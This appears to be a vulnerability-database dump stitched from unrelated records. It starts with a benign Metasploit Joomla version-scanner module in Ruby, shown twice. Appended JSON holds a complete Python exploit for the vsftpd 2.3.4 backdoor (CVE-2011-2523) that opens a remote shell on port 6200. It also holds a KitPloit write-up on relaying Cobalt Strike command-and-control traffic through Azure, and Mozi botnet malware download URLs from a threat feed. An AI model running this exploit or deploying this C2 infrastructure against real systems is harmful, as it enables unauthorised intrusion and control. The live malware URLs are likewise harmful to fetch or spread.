ID MSF:AUXILIARY/SCANNER/HTTP/JOOMLA_VERSION Type metasploit Reporter Rapid7 Modified 2017-07-24T13:26:21
Description
This module scans a Joomla install for information about the underlying operating system and Joomla version.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
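class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HTTP::Joomla
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  # Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to
  # Joomscan and various MSF modules for code examples.
  def initialize
    super(
      'Name' => 'Joomla Version Scanner',
      'Description' => %q{
        This module scans a Joomla install for information about the underlying
        operating system and Joomla version.
      },
      'Author' => [ 'newpid0' ],
      'License' => MSF_LICENSE
    )
  end

  # Fetches the HTTP `Server` header from the target's base URI.
  #
  # This module used to determine the operating system by the server header. But this is
  # not an accurate way to do OS detection, so we have toned it down to just returning the
  # header, and let the user decide. The value is supplied by the remote server; it is only
  # echoed back to the operator, never parsed or trusted for anything else.
  #
  # @return [String, nil] the raw Server header, or nil when there was no response or no header
  def get_server_header
    res = send_request_cgi('uri' => normalize_uri(target_uri.path))
    # No response at all (nil) is treated the same as a response without the header.
    return nil unless res

    res.headers['Server']
  end

  # Scanner entry point, invoked once per host by Msf::Auxiliary::Scanner.
  #
  # Checks that Joomla is reachable, then reports the Server header and the detected
  # Joomla version; the version is also stored via report_note so other modules can use it.
  #
  # @param ip [String] address of the host being scanned; used as the host for report_note
  # @return [void]
  def run_host(ip)
    unless joomla_and_online?
      print_error("It doesn't look like Joomla is up and running at #{target_uri}")
      return
    end

    server = get_server_header
    version = joomla_version

    if server
      print_status("Server: #{server}")
    else
      print_error('Unable to determine server.')
    end

    if version
      print_good("Joomla version: #{version}")
      # Persist the finding; proto mirrors the SSL setting so the note matches the service.
      report_note(
        host: ip,
        port: datastore['RPORT'],
        proto: ssl ? 'https' : 'http',
        ntype: 'joomla.version',
        data: version
      )
    else
      print_error('Unable to find Joomla version.')
    end
  end
end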
{"id": "MSF:AUXILIARY/SCANNER/HTTP/JOOMLA_VERSION", "type": "metasploit", "bulletinFamily": "exploit", "title": "Joomla Version Scanner", "description": "This module scans a Joomla install for information about the underlying operating system and Joomla version.\n", "published": "2013-01-25T19:44:49", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2020-02-17T03:31:40", "viewCount": 371, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2020-02-17T03:31:40", "rev": 2}, "dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:5697636294568844262", "KITPLOIT:4382548335947477511", "KITPLOIT:4039790738926215375"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1723-1", "OPENSUSE-SU-2020:1724-1", "OPENSUSE-SU-2020:1719-1"]}, {"type": "openbugbounty", "idList": ["OBB:1441302", "OBB:1441308", "OBB:1441299", "OBB:1441285", "OBB:1441310", "OBB:1441309", "OBB:1441294", "OBB:1441297", "OBB:1441298", "OBB:1441306"]}], "modified": "2020-02-17T03:31:40", "rev": 2}, "vulnersScore": 0.2}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/joomla_version.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HTTP::Joomla\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n # Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. 
Finally thanks to\n # Joomscan and various MSF modules for code examples.\n def initialize\n super(\n 'Name' => 'Joomla Version Scanner',\n 'Description' => %q{\n This module scans a Joomla install for information about the underlying\n operating system and Joomla version.\n },\n 'Author' => [ 'newpid0' ],\n 'License' => MSF_LICENSE\n )\n end\n\n def get_server_header\n # This module used to determine the operating system by the server header. But this is\n # not an accurate way to do OS detection, so we have toned it down to just returning the\n # header, and let the user decide.\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path)\n })\n\n if res && res.headers['Server']\n return res.headers['Server']\n end\n\n nil\n end\n\n def run_host(ip)\n unless joomla_and_online?\n print_error(\"It doesn't look like Joomla is up and running at #{target_uri.to_s}\")\n return\n end\n\n server = get_server_header\n version = joomla_version\n\n if server\n print_status(\"Server: #{server}\")\n else\n print_error(\"Unable to determine server.\")\n end\n\n if version\n print_good(\"Joomla version: #{version}\")\n report_note(\n host: ip,\n port: datastore['RPORT'],\n proto: ssl ? 'https' : 'http',\n ntype: 'joomla.version',\n data: version\n )\n else\n print_error(\"Unable to find Joomla version.\")\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "immutableFields": []}
{"exploitdb": [{"lastseen": "2021-04-12T10:29:31", "description": "", "published": "2021-04-12T00:00:00", "type": "exploitdb", "title": "vsftpd 2.3.4 - Backdoor Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-2523"], "modified": "2021-04-12T00:00:00", "id": "EDB-ID:49757", "href": "https://www.exploit-db.com/exploits/49757", "sourceData": "# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution\r\n# Date: 9-04-2021\r\n# Exploit Author: HerculesRD\r\n# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html\r\n# Version: vsftpd 2.3.4\r\n# Tested on: debian\r\n# CVE : CVE-2011-2523\r\n\r\n#!/usr/bin/python3 \r\n \r\nfrom telnetlib import Telnet \r\nimport argparse\r\nfrom signal import signal, SIGINT\r\nfrom sys import exit\r\n\r\ndef handler(signal_received, frame):\r\n # Handle any cleanup here\r\n print(' [+]Exiting...')\r\n exit(0)\r\n\r\nsignal(SIGINT, handler) \r\nparser=argparse.ArgumentParser() \r\nparser.add_argument(\"host\", help=\"input the address of the vulnerable host\", type=str)\r\nargs = parser.parse_args() \r\nhost = args.host \r\nportFTP = 21 #if necessary edit this line\r\n\r\nuser=\"USER nergal:)\"\r\npassword=\"PASS pass\"\r\n\r\ntn=Telnet(host, portFTP)\r\ntn.read_until(b\"(vsFTPd 2.3.4)\") #if necessary, edit this line\r\ntn.write(user.encode('ascii') + b\"\\n\")\r\ntn.read_until(b\"password.\") #if necessary, edit this line\r\ntn.write(password.encode('ascii') + b\"\\n\")\r\n\r\ntn2=Telnet(host, 6200)\r\nprint('Success, shell opened')\r\nprint('Send `exit` to quit shell')\r\ntn2.interact()", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/49757"}], "kitploit": [{"lastseen": "2021-04-12T00:31:24", "bulletinFamily": "tools", "cvelist": [], "description": "[  ](<https://1.bp.blogspot.com/-gW4iYIx5CtU/YGvhCi0WHtI/AAAAAAAAV0w/BVU7TtULfJ4WX32_09My7WRrmnWotrnfgCNcBGAsYHQ/s1119/cpufetch_7_i9.png>)\n\n \n\n\nSimplistic yet 
fancy CPU architecture fetching tool \n\n \n\n\n** 1\\. Support ** \n\n\ncpufetch currently supports x86_64 CPUs (both Intel and AMD) and ARM. \n\nPlatform | x86_64 | ARM | Notes \n---|---|---|--- \nLinux | \n\n\u2714\ufe0f \n\n| \n\n\u2714\ufe0f \n\n| Prefered platform. \nExperimental ARM support \nWindows | \n\n\u2714\ufe0f \n\n| \n\n\u274c \n\n| Some information may be missing. \nColors will be used if supported \nAndroid | \n\n\u2757 \n\n| \n\n\u2714\ufe0f \n\n| Experimental ARM support \nmacOS | \n\n\u2714\ufe0f \n\n| \n\n\u274c \n\n| Some information may be missing \nEmoji | Meaning \n---|--- \n \n\u2714\ufe0f \n\n| Supported \n \n\u274c \n\n| Not supported \n \n\u2757 \n\n| Not tested \n \n** 2\\. Installation ** \n \n** 2.1 Building from source ** \n\n\nJust clone the repo and use ` make ` to compile it \n \n \n git clone https://github.com/Dr-Noob/cpufetch \n cd cpufetch \n make \n ./cpufetch \n \n\nThe Makefile is designed to work on Linux, [ Windows ](<https://www.kitploit.com/search/label/Windows> \"Windows\" ) and macOS. \n\n \n** 2.2 Linux ** \n\n\nThere is a cpufetch package available in [ Arch Linux ](<https://www.kitploit.com/search/label/Arch%20Linux> \"Arch Linux\" ) ( [ cpufetch-git ](<https://aur.archlinux.org/packages/cpufetch-git> \"cpufetch-git\" ) ). If you are in another distribution, you can build ` cpufetch ` from source. \n\n \n** 2.2 Windows ** \n\n\nIn the [ releases ](<https://github.com/Dr-Noob/cpufetch/releases> \"releases\" ) section you will find some cpufetch executables compiled for Windows. Just download and run it from Windows CMD. You can also build ` cpufetch ` from source. \n\n \n** 2.3 macOS ** \n\n\nYou need to build ` cpufetch ` from source. \n\n \n** 2.4 Android ** \n\n\n 1. Install ` termux ` app (terminal emulator) \n 2. Run ` pkg install -y git make clang ` inside termux. \n 3. 
Build from source normally: \n * git clone [ https://github.com/Dr-Noob/cpufetch ](<https://github.com/Dr-Noob/cpufetch> \"https://github.com/Dr-Noob/cpufetch\" )\n * cd cpufetch \n * make \n * ./cpufetch \n \n** 3\\. Examples ** \n\n\nHere are more examples of how ` cpufetch ` looks on different CPUs. \n\n \n** 3.1 x86_64 CPUs ** \n\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-fFmkaqMp5qM/YGvhKvuE5_I/AAAAAAAAV04/1cxvYR0awmEHVHpfc1ZRPb6878gF941zwCNcBGAsYHQ/s1033/cpufetch_8_epyc.png>)\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-BoCNiF_Mqg8/YGvhKiEovqI/AAAAAAAAV00/RlkLaqx5wAoGfy2RTAfdhbg4EO_qiqL4wCNcBGAsYHQ/s1107/cpufetch_9_cascade_lake.png>)\n\n \n\n\n** 3.2 ARM CPUs ** \n\n\n[  ](<https://1.bp.blogspot.com/-liHK00gR8qM/YGvhQARp_UI/AAAAAAAAV1A/ouY0-MaMm7ICBCsrfvpCeS0F2BGlAcK1gCNcBGAsYHQ/s1173/cpufetch_11_snapdragon.png>)\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-a3y22tYqlAk/YGvhQOcvTZI/AAAAAAAAV08/J5y8fKfYp9spQALMfEb0HKIwbtl2BpxQQCNcBGAsYHQ/s1173/cpufetch_10_exynos.png>)\n\n \n\n\n** 4\\. Colors and style ** \n\n\nBy default, ` cpufetch ` will print the CPU art with the system colorscheme. However, you can always set a custom color scheme, either specifying Intel or AMD, or specifying the colors in RGB format: \n \n \n ./cpufetch --color intel (default color for Intel) \n ./cpufetch --color amd (default color for AND) \n ./cpufetch --color 239,90,45:210,200,200:100,200,45:0,200,200 (example) \n \n\nIn the case of setting the colors using RGB, 4 colors must be given in with the format: ` [R,G,B:R,G,B:R,G,B:R,G,B] ` . These colors correspond to CPU art color (2 colors) and for the text colors (following 2). Thus, you can customize all the colors. \n\n \n** 5\\. Implementation ** \n\n\nSee [ cpufetch programming documentation ](<https://github.com/Dr-Noob/cpufetch/blob/master/doc/README.md> \"cpufetch programming documentation\" ) . \n\n \n** 6\\. 
Bugs or improvements ** \n\n\nThere are many open issues in github (see [ issues ](<https://github.com/Dr-Noob/cpufetch/issues> \"issues\" ) ). Feel free to open a new one report an issue or propose any improvement in ` cpufetch `\n\nI would like to thank [ Gonzalocl ](<https://github.com/Gonzalocl> \"Gonzalocl\" ) and [ OdnetninI ](<https://github.com/OdnetninI> \"OdnetninI\" ) for their help, running ` cpufetch ` in many different CPUs they have [ access ](<https://www.kitploit.com/search/label/Access> \"access\" ) to, which makes it easier to debug and check the correctness of ` cpufetch ` . \n\n \n \n\n\n** [ Download Cpufetch ](<https://github.com/Dr-Noob/cpufetch> \"Download Cpufetch\" ) **\n", "edition": 1, "modified": "2021-04-11T21:30:00", "published": "2021-04-11T21:30:00", "id": "KITPLOIT:9097120095283720847", "href": "http://www.kitploit.com/2021/04/cpufetch-simplistic-yet-fancy-cpu.html", "title": "Cpufetch - Simplistic Yet Fancy CPU Architecture Fetching Tool", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-11T16:38:55", "bulletinFamily": "tools", "cvelist": [], "description": "[  ](<https://1.bp.blogspot.com/-oa6G92plSqA/YGvgYtysKHI/AAAAAAAAV0o/t4My_zkK6c8t1pBye3UvChXovumbmPIBgCNcBGAsYHQ/s2048/AzureC2Relay_1_AzureRelay.png>)\n\n \n\n\nAzureC2Relay is an Azure Function that validates and relays [ Cobalt Strike ](<https://www.kitploit.com/search/label/Cobalt%20Strike> \"Cobalt Strike\" ) [ beacon ](<https://www.kitploit.com/search/label/Beacon> \"beacon\" ) [ traffic ](<https://www.kitploit.com/search/label/Traffic> \"traffic\" ) by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile. Any incoming requests that do not share the profiles user-agent, URI paths, headers, and query parameters, will be redirected to a configurable decoy website. The validated C2 traffic is relayed to a team server within the same virtual network that is further restricted by a network security group. 
Allowing the VM to only expose SSH. \n\n \n\n\n** Deploy ** \n\n\nAzureC2Relay is deployed via [ terraform ](<https://www.kitploit.com/search/label/Terraform> \"terraform\" ) azure modules as well as some local az cli commands \n\nMake sure you have terraform , az cli and the dotnet core 3.1 runtime installed \n\nWindows (Powershell) \n \n \n &([scriptblock]::Create((Invoke-WebRequest -UseBasicParsing 'https://dot.net/v1/dotnet-install.ps1'))) -runtime dotnet -version 3.1.0 \n Invoke-WebRequest 'https://releases.hashicorp.com/terraform/0.14.6/terraform_0.14.6_windows_amd64.zip' -OutFile 'terraform.zip' \n Expand-Archive -Path terraform.zip -DestinationPath \"$([Environment]::GetFolderPath('ApplicationData'))\\TerraForm\\\" \n setx PATH \"%PATH%;$([Environment]::GetFolderPath('ApplicationData'))\\TerraForm\\\" \n Invoke-WebRequest -Uri https://aka.ms/installazurecliwindows -OutFile .\\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I AzureCLI.msi /quiet'; rm .\\AzureCLI.msi \n \n\nMac \n \n \n curl -L https://dot.net/v1/dotnet-install.sh | bash -s -- --runtime dotnet --version 3.1.0 \n brew update \n brew tap hashicorp/tap \n brew install hashicorp/tap/terraform \n brew install azure-cli \n \n\nUbuntu , Debian \n \n \n curl -L https://dot.net/v1/dotnet-install.sh | bash -s -- --runtime dotnet --version 3.1.0 \n wget https://releases.hashicorp.com/terraform/0.14.5/terraform_0.14.5_linux_amd64.zip \n unzip terraform_0.14.5_linux_amd64.zip \n sudo cp terraform /usr/local/bin/terraform \n curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash \n \n\nKali \n \n \n curl -L https://dot.net/v1/dotnet-install.sh | bash -s -- --runtime dotnet --version 3.1.0 \n wget https://releases.hashicorp.com/terraform/0.14.5/terraform_0.14.5_linux_amd64.zip \n unzip terraform_0.14.5_linux_amd64.zip \n sudo cp terraform /usr/local/bin/terraform \n echo \"deb [arch=amd64] https://packages.microsoft.com/repos/azure-cli/ stretch main\" | sudo tee 
/etc/apt/sources.list.d/azure-cli.list \n curl -L https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add - \n sudo apt-get update && sudo apt-get install apt-transport-https azure-cli \n \n\n 1. Modify the first variables defined in ` config.tf ` to suit your needs \n 2. Replace the dummy \"cobaltstrike-dist.tgz\" with an actual cobaltstrike download \n 3. Edit/Replace the Malleable profile inside the Ressources folder (Make sure the profile filename matches the variables you set in step 1) \n 4. login with azure ` az login `\n 5. run ` terraform init `\n 6. run ` terraform apply -auto-approve ` to deploy the infra \n 7. Wait for the CDN to become active and enjoy! \n\nOnce terraform completes it will provide you with the needed ssh command, the [ CobaltStrike ](<https://www.kitploit.com/search/label/CobaltStrike> \"CobaltStrike\" ) teamserver will be running inside an tmux session on the deployed VM \n\nWhen your done using the infra, you can remove it with ` terraform destroy -auto-approve `\n\n \n \n\n\n** [ Download AzureC2Relay ](<https://github.com/Flangvik/AzureC2Relay> \"Download AzureC2Relay\" ) **\n", "edition": 1, "modified": "2021-04-11T12:30:00", "published": "2021-04-11T12:30:00", "id": "KITPLOIT:4380638570301219950", "href": "http://www.kitploit.com/2021/04/azurec2relay-azure-function-that.html", "title": "AzureC2Relay - An Azure Function That Validates And Relays Cobalt Strike Beacon Traffic By Verifying The Incoming Requests Based On A Cobalt Strike Malleable C2 Profile", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}], "rst": [{"lastseen": "2021-04-10T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **http://59[.]151.202.3:3100/mozi.a** in [RST Threat Feed](https://rstcloud.net/profeed) with score **19**.\n First seen: 2021-01-05T03:00:00, Last seen: 2021-04-10T03:00:00.\n IOC tags: **malware**.\nIt was found that the IOC is used by: **mozi**.\n[https://rstcloud.net/](https://rstcloud.net/)", 
"edition": 1, "modified": "2021-01-05T00:00:00", "id": "RST:635919F8-C013-3142-814A-75918C7EFA04", "href": "", "published": "2021-04-11T00:00:00", "title": "RST Threat feed. IOC: http://59.151.202.3:3100/mozi.a", "type": "rst", "cvss": {}}, {"lastseen": "2021-04-10T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **http://59[.]151.202.3:3100/mozi.m** in [RST Threat Feed](https://rstcloud.net/profeed) with score **19**.\n First seen: 2021-01-05T03:00:00, Last seen: 2021-04-10T03:00:00.\n IOC tags: **malware**.\nIt was found that the IOC is used by: **mozi**.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-05T00:00:00", "id": "RST:B93CAF71-1AA0-322E-9FC9-A6DDA6F3A384", "href": "", "published": "2021-04-11T00:00:00", "title": "RST Threat feed. IOC: http://59.151.202.3:3100/mozi.m", "type": "rst", "cvss": {}}, {"lastseen": "2021-04-10T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **http://59[.]151.214.4:4132/mozi.m** in [RST Threat Feed](https://rstcloud.net/profeed) with score **32**.\n First seen: 2021-02-21T03:00:00, Last seen: 2021-04-10T03:00:00.\n IOC tags: **malware**.\nIt was found that the IOC is used by: **mozi**.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-21T00:00:00", "id": "RST:E0632DAD-E47F-392B-9A6D-F8E45E2FCA05", "href": "", "published": "2021-04-11T00:00:00", "title": "RST Threat feed. 
IOC: http://59.151.214.4:4132/mozi.m", "type": "rst", "cvss": {}}, {"lastseen": "2021-04-10T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **http://59[.]151.237.51:4994/i** in [RST Threat Feed](https://rstcloud.net/profeed) with score **37**.\n First seen: 2021-03-04T03:00:00, Last seen: 2021-04-10T03:00:00.\n IOC tags: **malware**.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-03-04T00:00:00", "id": "RST:957F9E3A-6D81-3AEB-BBBA-2855899FBA86", "href": "", "published": "2021-04-11T00:00:00", "title": "RST Threat feed. IOC: http://59.151.237.51:4994/i", "type": "rst", "cvss": {}}, {"lastseen": "2021-04-10T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **http://59[.]151.246.125:4245/i** in [RST Threat Feed](https://rstcloud.net/profeed) with score **8**.\n First seen: 2021-02-07T03:00:00, Last seen: 2021-04-10T03:00:00.\n IOC tags: **malware**.\nIOC could be a **False Positive** (Resource unavailable).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-07T00:00:00", "id": "RST:BA6E101E-D0DB-36A7-9249-B1306D3A07ED", "href": "", "published": "2021-04-11T00:00:00", "title": "RST Threat feed. IOC: http://59.151.246.125:4245/i", "type": "rst", "cvss": {}}, {"lastseen": "2021-04-10T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **http://59[.]151.246.125:4245/mozi.m** in [RST Threat Feed](https://rstcloud.net/profeed) with score **19**.\n First seen: 2021-01-05T03:00:00, Last seen: 2021-04-10T03:00:00.\n IOC tags: **malware**.\nIt was found that the IOC is used by: **mozi**.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-05T00:00:00", "id": "RST:3C0D4E23-1F3B-3B20-B661-BB95B79AF2CC", "href": "", "published": "2021-04-11T00:00:00", "title": "RST Threat feed. 
IOC: http://59.151.246.125:4245/mozi.m", "type": "rst", "cvss": {}}, {"lastseen": "2021-04-10T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **http://59[.]173.135.51:60757/bin.sh** in [RST Threat Feed](https://rstcloud.net/profeed) with score **63**.\n First seen: 2021-04-08T03:00:00, Last seen: 2021-04-10T03:00:00.\n IOC tags: **malware**.\nIt was found that the IOC is used by: **mozi**.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-04-08T00:00:00", "id": "RST:7EE41666-82CA-3E0D-B7EA-B208CDF11E14", "href": "", "published": "2021-04-11T00:00:00", "title": "RST Threat feed. IOC: http://59.173.135.51:60757/bin.sh", "type": "rst", "cvss": {}}, {"lastseen": "2021-04-10T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **http://59[.]173.135.51:60757/i** in [RST Threat Feed](https://rstcloud.net/profeed) with score **63**.\n First seen: 2021-04-08T03:00:00, Last seen: 2021-04-10T03:00:00.\n IOC tags: **malware**.\nIt was found that the IOC is used by: **mozi**.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-04-08T00:00:00", "id": "RST:3C4B0C6C-F87D-3AEE-87D5-23490484C4D9", "href": "", "published": "2021-04-11T00:00:00", "title": "RST Threat feed. IOC: http://59.173.135.51:60757/i", "type": "rst", "cvss": {}}, {"lastseen": "2021-04-10T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **http://59[.]173.193.208:57080/mozi.m** in [RST Threat Feed](https://rstcloud.net/profeed) with score **59**.\n First seen: 2021-04-04T03:00:00, Last seen: 2021-04-10T03:00:00.\n IOC tags: **malware**.\nIt was found that the IOC is used by: **mozi**.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-04-04T00:00:00", "id": "RST:CC508DBE-0465-303F-BE27-8A2C1C1B6AFF", "href": "", "published": "2021-04-11T00:00:00", "title": "RST Threat feed. 
IOC: http://59.173.193.208:57080/mozi.m", "type": "rst", "cvss": {}}, {"lastseen": "2021-04-11T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **http://59[.]175.63.177:40561/mozi.m** in [RST Threat Feed](https://rstcloud.net/profeed) with score **66**.\n First seen: 2021-04-11T03:00:00, Last seen: 2021-04-11T03:00:00.\n IOC tags: **malware**.\nIt was found that the IOC is used by: **mozi**.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-04-11T00:00:00", "id": "RST:F303570E-D6B4-3F00-94FB-BA7B37A92678", "href": "", "published": "2021-04-11T00:00:00", "title": "RST Threat feed. IOC: http://59.175.63.177:40561/mozi.m", "type": "rst", "cvss": {}}]}